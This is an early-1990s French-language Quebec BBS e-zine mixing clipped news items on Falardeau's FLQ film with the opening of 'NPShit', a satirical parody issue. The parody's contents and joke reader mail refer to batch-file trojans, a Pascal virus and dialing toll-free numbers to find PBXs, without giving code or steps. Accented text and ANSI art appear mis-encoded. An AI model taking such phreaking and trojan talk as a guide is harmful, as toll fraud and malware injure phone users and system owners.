a ‚t‚ adjoint sp‚cial de l'ancien premier ministre, mais
il soutient qu'il n'accepterait pas plus de financer un
film sur le caporal Denis Lortie (auteur d'une fusillade
mortelle … l'Assembl‚e nationale) ou sur la pornographie.
Une comparaison que Falardeau juge tordue puisque,
dit-il, les gens du FLQ ‚taient des r‚volutionnaires et
il appartient … chacun de nous de juger si ce qu'ils ont
fait ‚tait na‹f. Lui-mˆme a tranch‚ en pla‡ant en
‚pigraphe la citation d'Albert Camus: "N‚cessaire et
injustifiable."

- 30 -



Leeched from LE DEVOIR - Mardi 23 f‚vrier 1993

Financement par T‚l‚film
FALARDEAU COMME LES AUTRES!

par
Paule des RiviŠres


T‚l‚film jugera le sc‚nario du cin‚aste Pierre falardeau
sur le FLQ selon les mˆmes critŠres que tous les autres
projets qui lui seront soumis, soit sur sa qualit‚ et son
originalit‚. Si le film r‚pond aux conditions de
l'entreprise f‚d‚rale, il sera subventionn‚. Sinon, il
devra aller chercher de l'aide ailleurs.
Voil… les commentaires faits hier … T‚l‚film aprŠs
qu'un s‚nateur lib‚ral, Philippe Gigantes, eut d‚nonc‚ le
projet du film, qui selon lui glorifie le FLQ. Le
s‚nateur a aussi d‚nonc‚ l'entreprise f‚d‚rale T‚l‚film
Canada qui a d‚j… accord‚ 50 000$ … Falardeau pour le
d‚veloppement du projet. Il reste que la vraie d‚cision,
celle de soutenir la production du long m‚trage projet‚,
ne viendra que dans deux mois.
"Nous ne sommes naturellement pas immunis‚s contre
les commentaires. Mais il s'agit d'un film de fiction et
nous le jugerons comme tel en regardant le sc‚nario, les
projets de mise en march‚ et de distribution, la
structure financiŠre de la compagnie", d‚clarait hier un
porte-parole de T‚l‚film.
Falardeau n'est pas un nouveau venu … T‚l‚film. Il
a re‡u des fonds pour deux de ses films pr‚c‚dents, LE
PARTY, dont l'action se d‚roulait dans un p‚nitencier, et
LE STEAK, sur la vie du boxeur Gaetan Hart. Pour le
sc‚nario du film projet‚, M. Falardeau s'est inspir‚ du
livre POUR EN FINIR AVEC OCTOBRE de Francis Simard, un
des ravisseurs. Le r‚alisateur estime pour sa part que
condamner son film … l'avance ‚quivaut … un refus de voir
la r‚alit‚ en face.

- 30 -


[Blitz - Falardeau a aussi ‚crit et r‚alis‚ votre film
pr‚f‚r‚ et le mien: ELVIS GRATTON... Il faudrait bien que
NPC fasse une entrevue avec lui un jour... Tous les films
de Falardeau, en fait (et ceux qui ont aussi vu LE PARTY,
un autre film bas‚ sur le bouquin d'un autre ex-
felquiste, sauront de quoi je veux parler), tous ses
films sont autant de couteaux bien aff–t‚s qui tranchent
dans la connerie quotidienne. A quand un film sur les
s‚nateurs, Pierre? ;-)
En passant, ce fameux Gigantes, aviez-vous d‚j… entendu
parler de lui? Et Della Noce? Comment ‡a se fait que la
politique attire autant de cr‚tins? Des mecs qui, tout …
coup, se r‚veillent et se disent: "Tiens! Je devrais me
faire un nom, moi-l…!" Parce que ce n'est pas autre chose
que leur quinze minutes de gloire qu'ils cherchent, ces
cr‚tins. Et plut“t que de les gagner en faisant passer
une loi dans le sens du monde, ou en votant un budget
sp‚cial pour r‚ouvrir Dernier Recours … Montr‚al, bref,
en mettant leurs gros culs grassement pay‚s au service du
peuple, ils choisissent plut“t de se faire un nom en
cassant du petit et de l'impopulaire. Della Noce et sa
ligne de d‚lation, Gigantes et sa censure ‚tatis‚e: mˆme
combat! Un petit test: nommez-moi le twit qui est arriv‚
avec l'id‚e que les casinos, ‡a allait r‚gler tous les
problŠmes de notre ‚conomie...

Pourquoi? Pourquoi? Pourquoi?
Pourquoi tant de d‚magogie et de cr‚tinisme bon teint
chez nos d‚cideurs?

Remarquez, c'est probablement le propre des pleutres et
des gens sans imagination d'essayer de faire son pain sur
le dos des cr‚ateurs.
Ca s'appelle du vampirisme.
Ce sont des profiteurs.
Merde, j'ai d‚j… utilis‚ cette expression-l… quelque
part, mais o—? Vampirisme, profiteur, voyons, ‡a va me
revenir... AH! Je sais! Une lettre que j'ai adress‚e au
cr‚ateur de ControlBreak, qui essaie de relancer son mag
moribond en y ajoutant une section "d'opinions" (j'aime
‡a quand quelqu'un pervertit les mots pour leur enlever
leur sens: un BNFICIAIRE de l'aide sociale, par
exemple: fait-on vraiment des b‚n‚fices avec le B.S? H‚!
Y est-y ben, le gars, il b‚n‚ficie de l'aide sociale!),
une section de rag ('scuzez d'ˆtre aussi direct) sur NPC.
Mais ceci est une autre histoire...]



Leeched from LE JOURNAL BELL - 1er f‚vrier 93

BRAVO!

Une fois de plus, notre rendement d'‚quipe a d‚pass‚
le seuil de 100%. Il atteint cette fois-ci 110%, malgr‚
une ann‚e pour le moins difficile.
Pour la premiŠre fois, tous les employ‚s recevront
la prime d'‚quipe. Elle ‚tait jusque l… r‚serv‚e au
personnel cadre. Une brochure expliquant le calcul de la
prime selon les divers niveaux d'emploi sera envoy‚e vers
la mi-f‚vrier. Les employ‚s recevront leur chŠque durant
la mˆme p‚riode.

- 30 -

Blitz says: Une prime pour tout le monde! De toute fa‡on,
on va majorer le taux de base de ces cochons de payants
de 50 %! C'est nous les plus crosseurs, c'est nous les
plus BELL! En passant, qu'ont en commun les gens de Bell
et les pirates am‚ricains? Voir ce qui suit pour la
r‚ponse...


Leeched from LE JOURNAL BELL vol. 28 #22 - 30 novembre 92

PETITES ANNONCES

V‚hicules

Jeep Comanche Pioneer, 1988, 2x4, 120 000km, 5 vitesses,
6 cyl, 4 l., CB, phares de brouillard, toile, 7 000$.
514-649-5128


- 30 -



ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

LA JEEP VIENT AVEC UN CELLULAIRE
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ




FICTION ET COMPAGNIE

NPShit
par Dynamix

Intro par Blitzkreig


Hum... Qu'avons-nous l…? Un magazine de petits rigolos, une parodie qui
vient de paraŒtre, NPShit! Qu'est-ce que ce texte fait dans la section
FICTION ET COMPAGNIE, me dites-vous? C'est que cette oeuvre magnifique
tient tout de mˆme plus de la fiction que de la r‚alit‚. C'est le propre
de toute satire, non? Dans la grande tradition du National Lampoon (pour
ceux qui sont au fait de la culture am‚ricaine), quelques clowns du 418
se sont fendus d'une caricature de NPC (le mensuel). Il parait que
l'imitation est la plus grande forme de flatterie, la plus sincŠre, en
tous les cas. Les gars, c'est trop!
Le r‚sultat est, le mot n'est pas trop fort, FORMIDABLE! Le maŒtre …
penser de ce groupe, David Turgeon, et moi-mˆme, avons eu une longue
conversation t‚l‚phonique (on vous fera un .VOC … un moment donn‚), o— je
lui ai fait part de mon amusement. Il a ‚t‚ ‚tonn‚ de ma r‚action,
croyant peut-ˆtre que nous prendrions la mouche. Rien n'est plus faux,
l'ai-je assur‚.
Personnellement (et je sais qu'Atreid et TSP partagent … tout le
moins le mˆme avis que moi), je ne pourrais pas ˆtre, d'aucune
fa‡on, en colŠre contre quelqu'un qui nous offre sa "dissidence"
avec un humour aussi brillant! Une discussion fort civilis‚e s'en
est ensuivie, o— j'ai pu, je l'espŠre, dissiper certaines
m‚conceptions qu'entretenait [DynamiX] notre ‚gard.
David m'a racont‚ que ‡a lui a pris deux semaines pour ‚crire NPCShit,
qu'il est responsable de la quasi-totalit‚ des textes, bien que certaines
des id‚es aient ‚t‚ sugg‚r‚es par des sous-fifres (non, j'ai pas dit
fifs!).
Encore une fois, bravo … David! Le travail de David est d'autant plus
appr‚ciable qu'il n'a lu, me disait-il, que le num‚ro 1 et une
partie du num‚ro 3. Son imagination et sa cr‚ativit‚ ont fait le
reste. Du beau travail!

Certaines personnes vont cependant s'‚tonner de notre d‚cision de
publier cette caricature dans NPC. C'est pourtant bien
simple, les aminches:

1) Nous sommes les premiers, nous de NPC, … ne pas h‚siter …
pointer du doigt "l'empereur qui n'a pas de vˆtements" (un conte
pour enfants: vous connaissez?). On serait bien malvenus d'en
vouloir … des gens qui nous indiquent d'une maniŠre aussi joviale
que notre pantalon commence … glisser...

2) La dissidence de David Turgeon est exprim‚e avec humour et
esprit. Plut“t que de jouer aux vierges offens‚es comme certains,
il a utilis‚ la voie de la parodie, dans la grande tradition du
National Lampoon. Mais je me r‚pŠte, l…, non?

3) NPShit est une caricature... Laissez-moi vous entretenir,
l'espace de quelques lignes, sur ce qu'est exactement l'art du
caricaturiste. Certains d'entre vous ont peut-ˆtre ‚cout‚ le POINT
qui pr‚c‚dait, je crois, la diffusion du plus r‚cent BYE BYE. Un
des invit‚s, justement, ‚tait Serge Chapleau, caricaturiste bien
connu. Il nous racontait, dans ses termes, que la caricature,
c'‚tait tout d'abord l'opportunit‚ d'AMPLIFIER les caract‚ristiques
du sujet vis‚. Exemple: tous les caricaturistes des m‚dias
AUGMENTENT le menton de Brian Mulroney de fa‡on d‚mesur‚e dans
leurs dessins. Mulroney, qui a d‚j… un menton avanc‚, se retrouve
dans ces dessins avec une face en forme de quartier de lune. Ces
mˆmes "‚ditorialistes" du dessin reproduisent Robert Bourassa avec
un GRAAAAAAAAAAAAAAAAAND nez, … la fa‡on de Pinocchio. De mˆme,
David Turgeon, qui a manifestement en lui le "germe" des grands
caricaturistes, a amplifi‚ les tics et les travers des auteurs de
NPC. Ben oui, on a des tics et des travers... nous sommes humains
nous aussi... mais on tente de corriger ‡a, et on va tenter
davantage, surtout sous l'impulsion d'une critique aussi
humoristique. David et ses assistants ont ici trouv‚ une fa‡on
originale de nous pousser … nous d‚passer. Ils ont compris que ce
n'est pas en nous rentrant dans les plumes avec la bˆtise pour
seule arme qu'on peut nous convaincre de changer...

4) Des grands mensuels ou hebdos comme TIME, NEWSWEEK et PLAYBOY ont
attendu parfois vingt ans avant d'ˆtre spooff‚s, lampoon‚s, parodi‚s. Et
nous, en trois num‚ros, on a d‚j… atteint ce statut? On ne portera
bient“t plus par terre, si ‡a continue. Il va falloir faire attention.
Tout ce que je souhaite, c'est que le prochain XJAA (dont nous avons
parl‚ dans le NPC #3), cens‚ "attaquer" NPC soit fait avec autant
d'humour... En parlant de XJAA, saviez-vous que deux parodies de ce
magazine, AJAX, circule sur les babs, alors que l'original n'est mˆme pas
encore sorti? Il faut le faire, non?
Parodier un mag qui n'existe pas encore: chapeau! Le parodier DEUX FOIS:
nous sommes au bord du d‚lire! Pour ceux qui d‚sireraient jeter un coup
d'oeil … l'oeuvre, nous les incluons dans nos PHUN WEEK ONLINE
(disponibles sur tous les babs 418 ayant une section NPC). Je tiens …
signaler, pour clore cet apart‚ sur XJAA, que les auteurs de cette
parodie ne sont pas de NPC.

Tout va tellement vite, je vous dis! Si jamais le travail de NPC
n'aura eu qu'UN SEUL effet b‚n‚fique sur la r‚gion, se sera bien
d'avoir r‚veill‚ les auteurs et les cr‚ateurs en vous! Un dernier
mot, avant de vous pr‚senter NPShit: ils ont mˆme pouss‚ la
ressemblance jusqu'… imiter le demo de TSP dans NPC #1. Allez
downloader dans les sections NPC des babs autoris‚s le demo de NPShit
aprŠs votre lecture. David, un homme-orchestre qui a tous les talents,
dont des dons certains de programmeur (il a mˆme r‚alis‚ certaines doors
qui circulent sur quelques babs … Qu‚bec), a fait une job du tonnerre
avec ce demo (il faut dire qu'il n'est pas peu fier de son travail, et
avec raison).

Grƒce … lui, votre journal pr‚f‚r‚ est plus gros de 80k!

Place … David Turgeon et … son oeuvre, NPShit!





ÛÛÜ ÜÜÜÜ ÜÜ
ÛÛÛÛÛÛÜ ÜÛÛÜ ßÛÛÛÛÜÜÜ ÜÜÛÛÛÛÛÜ ÜÜÜÜÜÛ|
ÛÛÛÛ ÛÛÛ|Û ÛÛÛ ÛÛÛßßßÛÛÛÜ ÛÛÛÛßßßßÛÛ ÛÛ ßßßßßßßÛÛÛÜ
ÛÛÛÛ þÛÛ|ßÜþÛÛ| ÛÛÛ ÛÛÛÛ ÛÛÜ ÜÛÛß ÛÛÜÛÛÜ ÛÛ ÛÛ ßÛ
þÛÛÛ ÛÛÛ ß ÛÛÛ ÛÛÛ ÜÛÛßß ÜÜÜ ßÛÛÜ ÛÛß ßÛÛ ÛÛ ÛÛ Û
ÛÛÛÛÜÜÜÜ ÛÛÛÜÛÛÛ Ü ÛÛÛ ßß ÛÛÛÜ ÜÛÛ Ü ÛÛ ÛÛß Û| ÛÛ Üß
ßÛÛÛß ÜÛÛ|

  
ßßÛÛÛÛß ßÜÜ ÜÛß ßß þÛ
ßÜÜÛÛß ßß Û

ÛßÛ Û ÛßÛ Ûß ÛÜ Û ßßßßß ÛßÛ Û ÛßÛ Û ßßß Ûß Ûßß Û ßßß ÛÜ
Û Û Û ÛÜÛ Û Û ÛßÛ ÛÛ Ûß Û Û Û Û Û ÛßÛ Û Ûß ÛÜÜ ÛßÛ Û Û
Û ÛÜÛ ÜÜÜÜÜÜ ÛÜ Û Û ÛÜ Û Û ÛÜÛ Ûßß Û Û Û Û ÜÜÛ Û Û Û ÛÜ

ßßßß ÛÛÛßßßß ÛÛÛßßßß ÛÛÛ ßÛÛ ÛÛÛÛßß Ü ÛÛÛßÛÛ ÛÛßÛÛ Ü ÛÛÜ ÛÛ
ÛÛÛß ÜÜÜÜÛÛÛ ÜÜÜÜÛÛÛ ÛÛÛÛÜÛÛ ÛÛÛÜÜÛ ß ÛÛ ÜÛÛ ÛÛÜÛÛ ß ßßß ÛÛ

A P R E V i O U S L Y U N K N O W N C H i L D P L A Y

Ansi (c)Caillou Chanceux


ÉÍÍÍÍ[ NOTE IMPORTANTE ]ÍÍÄÄÄÄ
º
ºCe magazine comporte des scŠnes de violence et de stupidit‚, il est
ºdonc recommand‚ … un auditoire adulte. (Des plans pour que personne
ºnous lise)
º
ºIl n'y a qu'un but vis‚ par les auteurs, celui de mettre sur pied un
ºmagazine humoristique destin‚ … faire rire leurs lecteurs.
º
ºBien qu'il y ait des ressemblances avec des personnes r‚elles, nous ne
ºvoulons en aucun cas nuire … leurs r‚putations. (Mˆme pour Fairy Dst
ºqui lui, est vraiment stupide) Certaines insinuations sortent directement
ºde notre imagination, veuillez ne pas en tenir compte lorsque vous re-
ºviendrez … la r‚alit‚. (Lorsque vous aurez fini la lecture de ce recueil
ºstupide.)
º
ºNous aimerions donc que ce magazine soit pris avec un grain d'humour
ºpar les personnes concern‚es, ainsi que par les parents des enfants
ºd‚sob‚issants qui auront tout de mˆme lu nos textes.
º
º La direction. (Avouez que ‡a fait s‚rieux)
º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

NPShit Issue 4 Contents
by Barbara Bush

Dans ce num‚ro:
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍþÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºSUJET ³AUTEUR º
º ³ º
ºContents ³Barbara Bush º
ºEdito ³Blitzcrest º
ºBravo du mois ³The Complete STaFF º
ºCourrier du lecteur ³The LECTEURS + the STAff º
ºComment changer de handle ³Dental Flush º
ºSHiT DRuGz: Plasticine ³Coaxial Karpette º
ºLe mot du m‚dium ³The m‚dium º
ºChronique mensuelle de prog³Peanut Butter º
ºProg avanc‚e: Faire un DEMO³Bloody Steak º
ºQu'est-ce qu'un ELITE ³Dental Flush º
ºDoS HACkS: Hacker une batch³BEEf BRoTH º
ºCrossing cenne machine ³Explosive Banana º
ºDo a BATCH FILE TROJAN ³Killer Ceiling Annihilatorº
ºComment gonfler un fichier ³Explosive Banana º
ºQuebec's Hackers: YANKUL ³Gelatine Butcher º
ºFlash NEWz ³OT/EB/NC º
ºAssembly: The Interrupt Z ³Socks Yogurt Eater º
ºLes BOARDS PUBLIX ³Fairy Comp”st º
ºTRUCS NPSHITIENS ³BBW/BB/TSN/Blitz/CC/Staff º
ºDifficult PROGS examples ³PCMaG º
ºChronique FICTION ³L'oGRe RuSSe º
ºDictionnaire de niaiseries ³Paleolithic Parking Lot º
ºCoded message ³The stillstaff º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍþÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ


Staff: þ Blitzcrest Contributors: þ Barbara Bush
þ Coaxial Karpette þ Le m‚dium
þ Peanut Butter þ Organic Terminology
þ Bloody Steak þ Null Character
þ Dental Flush þ Blackboard Warrior
þ BEEf BRoTH þ The Serial Number
þ Explosive Banana þ (c)Caillou Chanceux
þ Killer Ceiling Annihilator þ Yankul
þ Gelatine Butcher þ Atreid Bav‚tron
þ Socks Yogurt Eater þ Flour Rider
þ Fairy Comp”st þ Jigsaw Destroyer
þ L'oGRe RuSSe þ Paleolithic Parking Lot


Moyenne d'ƒge: 22 ......................Mois.


Greets: þ Barbara Bush parce que c'est la blonde … Blitzcrest pis que
Blitzcrest c'est le seul de la gang qui a r‚ussi … se pogner
une fille.
þ (c)Caillou Chanceux pour ses super beaux ansis.
þ Yankul pour nous avoir fait un prix d'ami pour la consulation.
þ Jigsaw Destroyer pour avoir fait le superbe NPSDEMO.EXE.
(Taboire qu'y programme ben ce gars-l…, j'en reviens pas!)


Dans le prochain num‚ro:
Comment sortir de l'asile
Comment crosser une machine … gomme
D'autres shit drugz
Comment phreaker un 300 bauds sans modem
La commande ECHO
Comment faire … croire qu'on est capable de programmer
Quoi faire quand notre tˆte enfle trop


ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ



Edito par Blitzcrest
ÍþÍþÍþÍ
Bienvenue dans NPShit!

Nous sommes la nouvelle g‚n‚ration des hots qui peuplent les
boards pirates. Et notre magazine NPShit sert … nous faire
connaŒtre au public. De plus, il nous aidera … faire du cash vu
qu'on va bient“t vous offrir des cours de BATCH FILES … domicile!
Enfin vous saurez comment utiliser les commandes ECHO et REM, et
vous vous retrouverez avec un paquet de batch files cr‚‚es par
Loocif Hair!

Une sp‚cification cependant! NPShit parle BILINGUE! Le monde
peuvent donc ‚crire en fran‡ais, en anglais, ou mˆme en japonais
s'ils ont le code page pour! (Notez qu'en fait, le monde ‚crit
pomal juste en fran‡ais... C'est vrai qu'ils ont juste un dipl“me
d'‚tudes primaires pour la plupart...)

Enfin... Si vous avez des id‚es, des suggestions, ou si vous
d‚couvrez comment faire des doors en batch files, callez-nous!
Bient“t on va avoir une VMB vu que le pŠre … Atreid Bav‚tron en
a une … son bureau!

Eeeeeh... Merci de toffer!

Blitzcrest


ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ


ÚÄÄ¿ ÚÄÄ¿ ÚÄÄ¿ ³ ³ ÚÄÄ¿
³ ³ ³ ³ ³ ³ ³ ³ ³ ³
ÃÄÄÙ ÃÄÄÙ ÃÄÄ´ ³ ³ ³ ³
ÃÄÄ¿ ÃÄÄ¿ ³ ³ ³ ³ ³ ³
³ ³ ³ ³ ³ ³ \ / ³ ³
ÀÄÄÙ ³ ³ ³ ³ \/ ÀÄÄÙ D U M O I S ! (ansi (c)Caillou Chanceux)

Nos f‚licitations … un membre du NPShit Staff, Fairy "Jordy" Comp”st,
pour le succŠs de sa chanson "Dur dur d'ˆtre un b‚b‚".

The complete STaFF


ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ


-=þ COURRIER DU LECTEUR þ=-

------------------------------------------------------------------
Msg #: [175/186] Base: NPShit Support
Date : Sat 02 Jan 1992 10:27a Stat: Public
From : MR-COCIENT
To : NpShit Staff
Title: pbx

J'ai dialer 2 numeros dans le 1-800 et j'ai toujours pas de PBX. Est-ce
Normal?

salut

-----------------------------------

Bloody Steak r‚pond:

Ecoute, t'avais juste … suivre notre cours priv‚ de 30$. C'est ‡a qui arrive
quand on veut tout apprendre seul. A l'avenir fait affaire a des PROS.
Je peux te donner un petit conseil gratuitement:
essaye de dialer 4-5 autres num‚ros, si tu en trouves toujours pas, c'est que
tu as vraiment pas de chance.

------------------------------------------------------------------
Msg #: [176/186] Base: NPShit Support
Date : Mon 04 Jan 1992 9:27p Stat: Public
From : >>Anonymous<<
To : NpShit Staff
Title: vIRUS EN pASCAL

Votre source de virus en pascal ne marche meme pas gang d'epais.

-----------------------------------

Bloody Steak r‚pond:

Ecoute plains-toi … celui qui l'a fait dans la version originale anglaise.
C'est pas de notre calice de faute si on a pogn‚ une mauvaise T-File fake
christ-nous patience.

------------------------------------------------------------------
Msg #: [177/186] Base: NPShit Support
Date : Mon 04 Jan 1992 11:37p Stat: Public
From : MOST OF PEOPLE
To : NpShit Staff
Title: criss de tete

Vous etes juste des calices de tetes enfler dans NPShit s'tu vrai?

un credule

-----------------------------------

Bloody Steak r‚pond:

Ouin ben Eeeee... celui qui le dit celui qui l'est...

Atreid Bav‚tron r‚pond:

Miroir, miroir Gna Gna Gna...

Flour Rider r‚pond:

Ceux qui disent ‡a c'est parce qui sont jaloux parce qui connaissent rien
pentoute. Nous autres on est une MACHINE fake ecoeurez-nous pas.

------------------------------------------------------------------
Msg #: [178/186] Base: NPShit Support
Date : Tue 05 Jan 1992 07:34a Stat: Public
From : Sysop De Protovision
To : NpShit Staff
Title: hack-hack-hack

Tins ca l'air que je suis pus rendu tout seul a mettre mon nom dans toute les
T-PHILES pis les progs que je rammasse par dessus les vrai auteurs.

(c)Caillou Chanceux.

-----------------------------------

Bloody Steak r‚pond:

Ouin comme t'es pomal habitu‚ de faire ‡a, pourquoi tu te joindrais pas …
nous?

------------------------------------------------------------------
Msg #: [179/186] Base: NPShit Support
Date : Tue 05 Jan 1992 3:02p Stat: Public
From : Most Of People
To : NpShit Staff
Title: Lamerz?

Bon j'ai lu la definition du mot lamer dans le NPShit #1.
Mais un gars qui Rip une texte file s'tu un lamer???

un Mutant Frosted

-----------------------------------

Bloody Steak r‚pond:

Ecoute selon Dental Flush, un Lamer s't'un ripper mais le mot ripper se
reporte seulement … des programmeurs. (Bonne d‚faite n'est-ce pas?)
Par contre tu as parfaitement le droit de rire de nous … ce sujet et de nous
traiter de morons.

------------------------------------------------------------------
Msg #: [180/186] Base: NPShit Support
Date : Wed 06 Jan 1992 9:45a Stat: Public
From : Toys 'R' Us (Julie Villeneuve #0)
To : NpShit Staff
Title: suck-suck-suck

Wow les gars votre magazine est super. c'est trop hot. J'en rˆve la nuit.
J'aimerais ˆtre votre leecheux officiel.

Zaknafein Mc'Craken

-----------------------------------

BEEf BRoTH r‚pond:

Merci. Nous recevons un nombre incalculable d'encouragements de nos nombreux
lecteurs (t'es le seul). Grƒce … vos encouragements, le magazine ne peut que
s'am‚liorer en matiŠre de ridicule. En passant, nos 2 premiŠres issues de
NPShit nous ont permis de prouver efficacement que le ridicule ne tue pas
(pas pour l'instant du moins).

Bloody Steak ajoute:

(En passant comme tu trouves le magazine super, pour toi ca va etre 25$, un
prix d'ami).

Gelatine Butcher meurt d'envie de te demander:

€a te tenterait-tu d'ouvrir une section NPShit sur Amburger BBS? La seule
condition c'est d'avoir moins de 14 ans! Merci de nous leecher!

------------------------------------------------------------------
Msg #: [181/186] Base: NPShit Support
Date : Wed 06 Jan 1992 12:52p Stat: Public
From : >>Anonymous<<
To : NpShit Staff
Title: chu essoufler!

Chers NPShit, meme si ses le premiers numero, j'adore beaucoup
votre magazine. je peut pas croire que y peut avoir du monde qui
vous aimes pas c'est absurdre!!!!! moi je vous vois dans ma soupe
pis dans ma pisse le matin, pis meme quand je chie ‡a me fait penser
… vous-autres!!!!

-----------------------------------

Socks Yogurt Eater r‚pond:

On t'a reconnu, Blitzcrest, arrˆte de te lancer des fleurs en anonyme!

------------------------------------------------------------------
Msg #: [182/186] Base: NPShit Support
Date : Wed 06 Jan 1992 2:28p Stat: Public
From : IKEA-AC/DC
To : NpShit Staff
Title: hack en asm

NPShit, j'ai un problŠme … hacker un programme en assembleur.
Aidez-moi! - IKEA-Assembled Creature

-----------------------------------

Killer Ceiling Annihilator r‚pond:

Euh... Euh... Mon frŠre me dit que ton problŠme se situe peut-ˆtre dans le
fait que les commentaires doivent toujours ˆtre pr‚c‚d‚s d'un point-virgule.
En passant, flash ton pseudo! €a te dirait-tu d'embarquer dans NPShit?
(Surtout que tu serais le seul qui connaŒtrait l'assembleur!)

------------------------------------------------------------------
Msg #: [183/186] Base: NPShit Support
Date : Wed 06 Jan 1992 3:16p Stat: Public
From : C‚ramix
To : NpShit Staff
Title: Eeeeh...

ouin ‡a flasherait que vous preniez MAZg pour faire NPShit... tk ‡a serait
pomal plus beau non?

}C‚ramix{

---
þ BustTag þ Use }MOCCO{ or die, sucker!

-----------------------------------

Atreid Bav‚tron r‚pond:

Penses-tu! C'est ben trop compliqu‚ … utiliser MAZg! Pis … part de ‡a c'est
mˆme pas faite en VGA. C'est pour ‡a qu'on prend des text files.

Pis en passant pour ton magazine Alt-PrintScreen, ‡a parle pas pantoute
des mˆmes affaires! Nous autres premiŠrement nos textes on est s–rs qu'ils
sont bons vu qu'on les prend dans des revues am‚ricaines pis qu'on les
traduit aprŠs.


ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
